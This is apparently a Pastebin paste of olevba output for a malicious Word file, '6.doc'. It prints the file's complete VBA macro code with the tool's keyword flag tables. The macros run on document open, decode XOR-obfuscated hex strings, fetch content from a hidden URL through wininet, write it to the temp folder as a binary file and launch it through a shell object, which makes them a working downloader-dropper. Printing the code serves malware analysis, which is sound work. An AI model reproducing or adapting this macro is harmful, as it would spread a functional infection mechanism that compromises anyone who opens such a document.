Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 6.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 6.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 6.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub TRENTON(MARCELINO As Long)
- HARRIS
- End Sub
- Sub autoopen()
- TRENTON (443)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As LongPtr, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
- #End If
- Public Function GENARO(ByRef GRAHAM As Object, ByRef ISAIAH As String, VAUGHN As Double) As Boolean
- Set AVERY = CreateObject _
- (BENNETT _
- (OCTAVIO, CORNELL))
- Dim NORRIS As Integer
- NORRIS = AVERY.Open(GRAHAM & ISAIAH)
- End Function
- Public Function GONZALO(DERICK As Long, RODRIGO As String, STACEY As String) As String
- DERICK = DERICK * 2
- GONZALO = BENNETT(RODRIGO, STACEY)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
- #End If
- Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
- GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
- End Function
- Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
- FLETCHER = (2 * GIOVANNI) - 1
- End Function
- Public Function BENNETT(HERSCHEL As String, WILMER As String) As String
- Dim NUMBERS As Integer
- Dim BUFORD As Integer
- Dim SANFORD As Long
- SANFORD = 221
- If SANFORD > SANFORD * 4 Then End
- Dim GIOVANNI As Long
- Dim BARNEY As String
- For GIOVANNI = 1 To (NESTOR(WILMER) / 2)
- NUMBERS = GERMAN(WILMER, GIOVANNI)
- BUFORD = LAVERNE(HERSCHEL, GIOVANNI)
- BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)
- Next GIOVANNI
- BENNETT = BARNEY
- End Function
- Public Sub HARRIS()
- Dim BERT As Double
- Dim SILAS As Double
- For SILAS = 67 To 68
- SILAS = SILAS + 99
- Next SILAS
- FREDERIC (5.09)
- End Sub
- Public Function MERRILL(MERLIN As String)
- Dim IRWIN As String
- IRWIN = "KIRBY"
- CLEMENT 44 + 0.33
- IRWIN = IRWIN + "CRUZ"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function RIGOBERTO(ALPHONSO As Long, ByVal SHELBY As String) As Boolean
- #If VBA7 And Win64 Then
- Dim RICKIE As LongPtr, BOBBIE As LongPtr
- #Else
- Dim RICKIE As Long, BOBBIE As Long
- #End If
- Dim MAURICIO As Long
- Dim SONNY As String * PASQUALE, DALTON As String
- Dim QUINCY As Integer, SEBASTIAN As Double
- RICKIE = EFRAIN
- If RICKIE = 0 Then
- Exit Function
- End If
- Dim FEDERICO As Boolean
- If CLIFF(BOBBIE, RICKIE) Then
- End If
- If BOBBIE = 0 Then
- SEBASTIAN = 0
- Else
- ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
- DALTON = SONNY
- Dim JACKSON As Integer
- JACKSON = 0
- JACKSON = JACKSON + 33
- If JACKSON > JACKSON + 40 Then End
- Do While MAURICIO <> 0
- ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
- DALTON = DALTON + Mid(SONNY, 1, MAURICIO)
- Loop
- SEBASTIAN = NESTOR(DALTON): _
- QUINCY = DONNELL("DAVIS")
- Open SHELBY _
- For Binary Access Write _
- Lock Write As #QUINCY
- Put #QUINCY, , DALTON
- JACKSON = JACKSON + 62
- If JACKSON < 0 Then End
- Close #QUINCY
- End If
- GAVIN BOBBIE
- GAVIN RICKIE
- DALTON = ""
- If SEBASTIAN Then
- RIGOBERTO = True
- End If
- End Function
- Public Function CLEMENT(ODELL As Double)
- Dim GONZALO As Object
- Dim MAXWELL As Long
- For MAXWELL = 16 To 17
- MAXWELL = MAXWELL + 17
- Next MAXWELL
- Dim ELLIS As Object
- For MAXWELL = 11 To 21
- MAXWELL = MAXWELL + 64
- Next MAXWELL
- Set ELLIS = LAURENCE
- MAXWELL = MAXWELL + 35
- Dim LEWIS As Boolean
- If MAXWELL > MAXWELL * 333 Then End
- LEWIS = JARVIS(GONZALO, ELLIS)
- ODELL = ODELL + 14
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
- #End If
- Public Const CORNELL = "062F303F38670F3529233C2D2642283A29"
- Public Const AURELIO = "09373C36263B2B73772A2D2B"
- Public Const WINFRED = "3D3321236E6661273C3F3827295E223D2E7B303B24617D6A60637F69533930"
- Public Const COLLIN = "0624273A243D272B3E6113272B53122C34213639062C2F3C2C21"
- Public Const OCTAVIO = "AUGUSTINEYOUNG6"
- Public Const PASQUALE = 4800
- Public Const MOHAMMAD As String = "LEONEL"
- Public Const MARIANO = 1
- Public Const DANIAL = &H4000000
- Sub FREDERIC(SANTOS As Double)
- MERRILL ("BLAIRLANDON")
- End Sub
- Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
- BRANDEN = Chr(NUMBERS Xor BUFORD)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const JASPER = "RUSSEL"
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
- Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
- Public Declare Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
- Public Declare Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As Long, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
- #End If
- Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
- LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod NESTOR(HERSCHEL)) + 1), 1))
- End Function
- Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
- BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
- SAMMY = SAMMY + 31
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr
- #Else
- Public Function EFRAIN() As Long
- #End If
- EFRAIN = SAMMIE(MOHAMMAD, MARIANO, vbNullString, vbNullString, 0)
- End Function
- Public Function NESTOR(JAYSON As String) As Long
- NESTOR = Len(JAYSON)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = BENNETT(OCTAVIO, COLLIN)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- #If VBA7 And Win64 Then
- Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim JACQUES As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = GONZALO(893, OCTAVIO, WINFRED)
- For JACQUES = 14 To 15
- JACQUES = JACQUES + 5.5
- Next JACQUES
- GRADY = MICHEL(NOAH, GUADALUPE, vbNullString, 0, DANIAL, 0)
- CLIFF = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
- #End If
- Public Function JARVIS(ByRef GRAHAM As Object, ByRef HOMER As Object) As Boolean
- Dim HARRISON As Long
- Set GRAHAM = IGNACIO(LAURENCE)
- Dim ADOLFO
- Dim ISAIAH As String
- ISAIAH = GONZALO(4096, OCTAVIO, AURELIO)
- For HARRISON = 6 To 8
- HARRISON = HARRISON * 55
- Next HARRISON
- ADOLFO = GRAHAM & ISAIAH
- If RIGOBERTO(354, ADOLFO) Then
- End If
- JARVIS = GENARO(GRAHAM, ISAIAH, 213)
- End Function
- Public Function DONNELL(JAYSON As String) As Integer
- DONNELL = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement